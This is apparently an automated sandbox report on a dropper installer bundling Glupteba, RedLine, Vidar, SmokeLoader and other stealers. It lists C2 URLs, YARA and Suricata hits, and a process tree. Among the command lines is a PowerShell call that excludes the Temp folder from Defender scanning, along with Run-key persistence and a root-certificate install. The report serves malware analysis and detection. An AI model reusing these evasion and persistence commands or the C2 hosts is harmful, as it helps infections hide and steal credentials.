glupteba | 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407

Resubmissions

09-09-2021 17:41

210909-v9lgtabfhq 10

09-09-2021 04:26

08-09-2021 21:37

08-09-2021 21:29

08-09-2021 13:52

07-09-2021 18:07

Analysis

max time kernel
24s
max time network
612s
platform
windows10_x64
resource
win10-en
submitted
09-09-2021 17:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

2.9MB
MD5

3f1f81101d0ce95fdfac97f5913cd662
SHA1

8e615a64e4d72b08926242b7d73a608bdd7e9fce
SHA256

90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
SHA512

a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285

Score

10^/10

glupteba metasploit redline smokeloader socelars vidar 706 916 jayson aspackv2 backdoor dropper infostealer loader persistence stealer suricata trojan

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

https://gheorghip.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

Jayson

95.181.172.207:56915

Extracted

Family

vidar

Version

40.5

Botnet

916

https://gheorghip.tumblr.com/

Attributes

profile_id
916

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

resource	yara_rule
behavioral9/memory/5420-513-0x0000000005000000-0x000000000591E000-memory.dmp	family_glupteba
behavioral9/memory/5420-529-0x0000000000400000-0x0000000002F85000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4416	2784	rundll32.exe	57
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3812	2784	rundll32.exe	57
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	2784	rundll32.exe	57

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

resource	yara_rule
behavioral9/memory/4332-242-0x000000000041C5E2-mapping.dmp	family_redline
behavioral9/memory/1352-305-0x000000000041C5E2-mapping.dmp	family_redline
behavioral9/memory/4332-237-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral9/memory/4580-387-0x000000000041C5E2-mapping.dmp	family_redline
behavioral9/memory/5948-447-0x000000000041C5E2-mapping.dmp	family_redline
behavioral9/memory/2828-487-0x000000000041C5E2-mapping.dmp	family_redline
behavioral9/memory/3700-532-0x000000000041C5E2-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral9/files/0x000400000001ab29-157.dat	family_socelars
behavioral9/files/0x000400000001ab29-172.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

rl_trojan 3 IoCs

redline stealer.

stealer

resource	yara_rule
behavioral9/files/0x000400000001ab2d-151.dat	redline
behavioral9/files/0x000400000001ab2d-164.dat	redline
behavioral9/files/0x000400000001ab2d-245.dat	redline

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata

Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral9/memory/536-207-0x00000000047C0000-0x0000000004891000-memory.dmp	family_vidar
behavioral9/memory/536-208-0x0000000000400000-0x0000000002BB2000-memory.dmp	family_vidar
behavioral9/memory/444-317-0x0000000002E50000-0x0000000002F21000-memory.dmp	family_vidar
behavioral9/memory/444-327-0x0000000000400000-0x0000000002BB2000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral9/files/0x000400000001ab1f-123.dat	aspack_v212_v242
behavioral9/files/0x000400000001ab1f-125.dat	aspack_v212_v242
behavioral9/files/0x000400000001ab21-128.dat	aspack_v212_v242
behavioral9/files/0x000500000001ab1d-124.dat	aspack_v212_v242
behavioral9/files/0x000500000001ab1d-131.dat	aspack_v212_v242
behavioral9/files/0x000400000001ab21-130.dat	aspack_v212_v242
behavioral9/files/0x000500000001ab1d-129.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 27 IoCs

pid	Process
4224	setup_installer.exe
4044	setup_install.exe
4652	Tue11d7385a978cc.exe
4532	Tue1109eec571ac.exe
616	Tue11e4e580f2e8141a3.exe
376	Tue11f251db82fb7b.exe
668	Tue118f55232e4.exe
3108	ultramediaburner.exe
3244	Tue11b9d76a96506.exe
4060	Tue11141271fbe5877f.exe
536	Tue112c483dd3245d.exe
2084	Tue11b9d76a96506.tmp
4632	LzmwAqmV.exe
4616	957068.exe
3700	Tue11e4e580f2e8141a3.exe
4380	cmd.exe
4548	Chrome 5.exe
4332	Tue11e4e580f2e8141a3.exe
2332	WerFault.exe
444	Alfanewfile2.exe
2648	2.exe
2184	setup.exe
1168	WinHoster.exe
4160	rundll32.exe
2716	3002.exe
1332	setup_2.tmp
4476	jhuuee.exe

Loads dropped DLL 8 IoCs

pid	Process
4044	setup_install.exe
4044	setup_install.exe
4044	setup_install.exe
4044	setup_install.exe
4044	setup_install.exe
4044	setup_install.exe
2084	Tue11b9d76a96506.tmp
1332	setup_2.tmp

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	Tue11e4e580f2e8141a3.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
59	ip-api.com
114	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 616 set thread context of 4332	616	Tue11e4e580f2e8141a3.exe	101
PID 616 set thread context of 1352	616	Tue11e4e580f2e8141a3.exe	128

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 35 IoCs

pid	pid_target	Process	procid_target
4120	4532	WerFault.exe	96
4524	1352	WerFault.exe
664	2184	WerFault.exe	109
5404	2184	WerFault.exe	109
5332	4532	WerFault.exe	96
5820	2184	WerFault.exe	109
5808	4532	WerFault.exe	96
828	4532	WerFault.exe	96
1324	2184	WerFault.exe	109
5312	2184	WerFault.exe	109
5836	2184	WerFault.exe	109
5380	4532	WerFault.exe	96
680	2184	WerFault.exe	109
2704	2184	WerFault.exe	109
5304	2184	WerFault.exe	109
2332	2184	WerFault.exe	109
4120	4532	WerFault.exe	96
2816	4532	WerFault.exe	96
4484	4532	WerFault.exe	96
6912	4616	WerFault.exe	102
5784	6328	WerFault.exe	198
2608	6328	WerFault.exe	198
6848	6328	WerFault.exe	198
7088	6328	WerFault.exe	198
3880	6328	WerFault.exe	198
1480	6968	WerFault.exe	221
5504	6276	WerFault.exe	213
2608	6276	WerFault.exe	213
4996	6276	WerFault.exe	213
5604	6276	WerFault.exe	213
2248	6276	WerFault.exe	213
428	6328	WerFault.exe	198
7156	6328	WerFault.exe	198
6668	6276	WerFault.exe	213
6192	6276	WerFault.exe	213

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ultramediaburner.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ultramediaburner.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ultramediaburner.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4944	schtasks.exe
1848	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
6988	timeout.exe
4428	timeout.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1200	taskkill.exe
996	taskkill.exe
4128	taskkill.exe
3812	taskkill.exe
5492	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Tue118f55232e4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Tue118f55232e4.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2800	powershell.exe
2800	powershell.exe
3108	ultramediaburner.exe
3108	ultramediaburner.exe
2800	powershell.exe
2800	powershell.exe
3080	Process not Found
3080	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3108	ultramediaburner.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	668	Tue118f55232e4.exe
Token: SeAssignPrimaryTokenPrivilege	668	Tue118f55232e4.exe
Token: SeLockMemoryPrivilege	668	Tue118f55232e4.exe
Token: SeIncreaseQuotaPrivilege	668	Tue118f55232e4.exe
Token: SeMachineAccountPrivilege	668	Tue118f55232e4.exe
Token: SeTcbPrivilege	668	Tue118f55232e4.exe
Token: SeSecurityPrivilege	668	Tue118f55232e4.exe
Token: SeTakeOwnershipPrivilege	668	Tue118f55232e4.exe
Token: SeLoadDriverPrivilege	668	Tue118f55232e4.exe
Token: SeSystemProfilePrivilege	668	Tue118f55232e4.exe
Token: SeSystemtimePrivilege	668	Tue118f55232e4.exe
Token: SeProfSingleProcessPrivilege	668	Tue118f55232e4.exe
Token: SeIncBasePriorityPrivilege	668	Tue118f55232e4.exe
Token: SeCreatePagefilePrivilege	668	Tue118f55232e4.exe
Token: SeCreatePermanentPrivilege	668	Tue118f55232e4.exe
Token: SeBackupPrivilege	668	Tue118f55232e4.exe
Token: SeRestorePrivilege	668	Tue118f55232e4.exe
Token: SeShutdownPrivilege	668	Tue118f55232e4.exe
Token: SeDebugPrivilege	668	Tue118f55232e4.exe
Token: SeAuditPrivilege	668	Tue118f55232e4.exe
Token: SeSystemEnvironmentPrivilege	668	Tue118f55232e4.exe
Token: SeChangeNotifyPrivilege	668	Tue118f55232e4.exe
Token: SeRemoteShutdownPrivilege	668	Tue118f55232e4.exe
Token: SeUndockPrivilege	668	Tue118f55232e4.exe
Token: SeSyncAgentPrivilege	668	Tue118f55232e4.exe
Token: SeEnableDelegationPrivilege	668	Tue118f55232e4.exe
Token: SeManageVolumePrivilege	668	Tue118f55232e4.exe
Token: SeImpersonatePrivilege	668	Tue118f55232e4.exe
Token: SeCreateGlobalPrivilege	668	Tue118f55232e4.exe
Token: 31	668	Tue118f55232e4.exe
Token: 32	668	Tue118f55232e4.exe
Token: 33	668	Tue118f55232e4.exe
Token: 34	668	Tue118f55232e4.exe
Token: 35	668	Tue118f55232e4.exe
Token: SeDebugPrivilege	376	Tue11f251db82fb7b.exe
Token: SeDebugPrivilege	4060	Tue11141271fbe5877f.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	4616	957068.exe
Token: SeDebugPrivilege	2648	2.exe
Token: SeDebugPrivilege	2332	WerFault.exe
Token: SeShutdownPrivilege	3080	Process not Found
Token: SeCreatePagefilePrivilege	3080	Process not Found
Token: SeShutdownPrivilege	3080	Process not Found
Token: SeCreatePagefilePrivilege	3080	Process not Found
Token: SeShutdownPrivilege	3080	Process not Found
Token: SeCreatePagefilePrivilege	3080	Process not Found
Token: SeShutdownPrivilege	3080	Process not Found
Token: SeCreatePagefilePrivilege	3080	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4700 wrote to memory of 4224	4700	setup_x86_x64_install.exe	76
PID 4700 wrote to memory of 4224	4700	setup_x86_x64_install.exe	76
PID 4700 wrote to memory of 4224	4700	setup_x86_x64_install.exe	76
PID 4224 wrote to memory of 4044	4224	setup_installer.exe	77
PID 4224 wrote to memory of 4044	4224	setup_installer.exe	77
PID 4224 wrote to memory of 4044	4224	setup_installer.exe	77
PID 4044 wrote to memory of 4564	4044	setup_install.exe	80
PID 4044 wrote to memory of 4564	4044	setup_install.exe	80
PID 4044 wrote to memory of 4564	4044	setup_install.exe	80
PID 4044 wrote to memory of 4492	4044	setup_install.exe	81
PID 4044 wrote to memory of 4492	4044	setup_install.exe	81
PID 4044 wrote to memory of 4492	4044	setup_install.exe	81
PID 4044 wrote to memory of 4488	4044	setup_install.exe	82
PID 4044 wrote to memory of 4488	4044	setup_install.exe	82
PID 4044 wrote to memory of 4488	4044	setup_install.exe	82
PID 4044 wrote to memory of 3292	4044	setup_install.exe	84
PID 4044 wrote to memory of 3292	4044	setup_install.exe	84
PID 4044 wrote to memory of 3292	4044	setup_install.exe	84
PID 4044 wrote to memory of 3336	4044	setup_install.exe	83
PID 4044 wrote to memory of 3336	4044	setup_install.exe	83
PID 4044 wrote to memory of 3336	4044	setup_install.exe	83
PID 4044 wrote to memory of 3956	4044	setup_install.exe	91
PID 4044 wrote to memory of 3956	4044	setup_install.exe	91
PID 4044 wrote to memory of 3956	4044	setup_install.exe	91
PID 4044 wrote to memory of 4584	4044	setup_install.exe	90
PID 4044 wrote to memory of 4584	4044	setup_install.exe	90
PID 4044 wrote to memory of 4584	4044	setup_install.exe	90
PID 4044 wrote to memory of 4608	4044	setup_install.exe	89
PID 4044 wrote to memory of 4608	4044	setup_install.exe	89
PID 4044 wrote to memory of 4608	4044	setup_install.exe	89
PID 4492 wrote to memory of 4652	4492	cmd.exe	85
PID 4492 wrote to memory of 4652	4492	cmd.exe	85
PID 4492 wrote to memory of 4652	4492	cmd.exe	85
PID 4564 wrote to memory of 2800	4564	cmd.exe	88
PID 4564 wrote to memory of 2800	4564	cmd.exe	88
PID 4564 wrote to memory of 2800	4564	cmd.exe	88
PID 4044 wrote to memory of 4344	4044	setup_install.exe	86
PID 4044 wrote to memory of 4344	4044	setup_install.exe	86
PID 4044 wrote to memory of 4344	4044	setup_install.exe	86
PID 4044 wrote to memory of 2608	4044	setup_install.exe	87
PID 4044 wrote to memory of 2608	4044	setup_install.exe	87
PID 4044 wrote to memory of 2608	4044	setup_install.exe	87
PID 3336 wrote to memory of 4532	3336	cmd.exe	96
PID 3336 wrote to memory of 4532	3336	cmd.exe	96
PID 3336 wrote to memory of 4532	3336	cmd.exe	96
PID 4584 wrote to memory of 616	4584	cmd.exe	95
PID 4584 wrote to memory of 616	4584	cmd.exe	95
PID 4584 wrote to memory of 616	4584	cmd.exe	95
PID 3292 wrote to memory of 376	3292	cmd.exe	93
PID 3292 wrote to memory of 376	3292	cmd.exe	93
PID 3956 wrote to memory of 3108	3956	cmd.exe	97
PID 3956 wrote to memory of 3108	3956	cmd.exe	97
PID 3956 wrote to memory of 3108	3956	cmd.exe	97
PID 4344 wrote to memory of 668	4344	cmd.exe	99
PID 4344 wrote to memory of 668	4344	cmd.exe	99
PID 4344 wrote to memory of 668	4344	cmd.exe	99
PID 4488 wrote to memory of 3244	4488	cmd.exe	98
PID 4488 wrote to memory of 3244	4488	cmd.exe	98
PID 4488 wrote to memory of 3244	4488	cmd.exe	98
PID 4608 wrote to memory of 4060	4608	cmd.exe	94
PID 4608 wrote to memory of 4060	4608	cmd.exe	94
PID 2608 wrote to memory of 536	2608	cmd.exe	92
PID 2608 wrote to memory of 536	2608	cmd.exe	92
PID 2608 wrote to memory of 536	2608	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4700
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS080B1544\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4564
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4492
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11d7385a978cc.exe
        
        Tue11d7385a978cc.exe
        5⤵
        Executes dropped EXE
        
        PID:4652
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4488
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11b9d76a96506.exe
        
        Tue11b9d76a96506.exe
        5⤵
        Executes dropped EXE
        
        PID:3244
      - C:\Users\Admin\AppData\Local\Temp\is-TRK0J.tmp\Tue11b9d76a96506.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TRK0J.tmp\Tue11b9d76a96506.tmp" /SL5="$A0054,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11b9d76a96506.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\is-TJR0Q.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-TJR0Q.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        
        PID:4380
        
        C:\Program Files\MSBuild\SYUNVUSUJJ\ultramediaburner.exe
        
        "C:\Program Files\MSBuild\SYUNVUSUJJ\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\is-3HM74.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3HM74.tmp\ultramediaburner.tmp" /SL5="$50120,281924,62464,C:\Program Files\MSBuild\SYUNVUSUJJ\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:5348
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:5380
        
        C:\Users\Admin\AppData\Local\Temp\77-a4e05-f0c-9348c-e8ce45201f535\Limarifomu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\77-a4e05-f0c-9348c-e8ce45201f535\Limarifomu.exe"
        8⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\6c-3e1ca-d96-fffbd-de375249db367\Lynunaxabae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6c-3e1ca-d96-fffbd-de375249db367\Lynunaxabae.exe"
        8⤵
        
        PID:4352
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\erpqhhk4.xfx\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\erpqhhk4.xfx\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\erpqhhk4.xfx\GcleanerEU.exe /eufive
        10⤵
        
        PID:6328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 648
        11⤵
        Program crash
        
        PID:5784
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 676
        11⤵
        Program crash
        
        PID:2608
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 768
        11⤵
        Program crash
        
        PID:6848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 800
        11⤵
        Program crash
        
        PID:7088
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 884
        11⤵
        Program crash
        
        PID:3880
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 928
        11⤵
        Program crash
        
        PID:428
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 1092
        11⤵
        Program crash
        
        PID:7156
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ro5kq2lp.xpw\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\ro5kq2lp.xpw\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\ro5kq2lp.xpw\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ro5kq2lp.xpw\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ro5kq2lp.xpw\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630949832 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:7120
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ytjrodtl.eb0\anyname.exe & exit
        9⤵
        
        PID:6384
        
        C:\Users\Admin\AppData\Local\Temp\ytjrodtl.eb0\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\ytjrodtl.eb0\anyname.exe
        10⤵
        
        PID:7016
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1zir0esn.o5f\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:6508
        
        C:\Users\Admin\AppData\Local\Temp\1zir0esn.o5f\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\1zir0esn.o5f\gcleaner.exe /mixfive
        10⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 648
        11⤵
        Program crash
        
        PID:5504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 668
        11⤵
        Program crash
        
        PID:2608
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 768
        11⤵
        Program crash
        
        PID:4996
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 812
        11⤵
        Program crash
        
        PID:5604
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 904
        11⤵
        Program crash
        
        PID:2248
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 956
        11⤵
        Program crash
        
        PID:6668
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 1092
        11⤵
        Program crash
        
        PID:6192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hdw5wtfb.3g0\autosubplayer.exe /S & exit
        9⤵
        
        PID:6736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3336
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue1109eec571ac.exe
        
        Tue1109eec571ac.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:4532
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 656
        6⤵
        Program crash
        
